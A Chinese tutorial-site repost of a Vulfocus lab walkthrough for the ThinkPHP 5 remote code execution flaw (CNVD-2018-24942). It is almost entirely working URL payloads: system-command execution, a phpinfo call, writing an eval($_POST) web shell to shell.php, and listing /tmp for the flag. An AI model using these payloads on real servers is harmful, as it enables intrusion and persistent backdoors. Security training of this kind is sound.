PHP教程

Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)

本文主要是介绍Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

tp5的经典漏洞

遇到tp5漏洞直接拿poc打就行

漏洞利用

1,利用system函数远程命令执行

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

2,查看phpinfo

payload:如下

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

3,写shell

linux shell脚本原因会过滤$_POST,所以要加\转义

payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST['cmd'])?>" >shell.php

 

拿flag

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

 

 

这篇关于Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!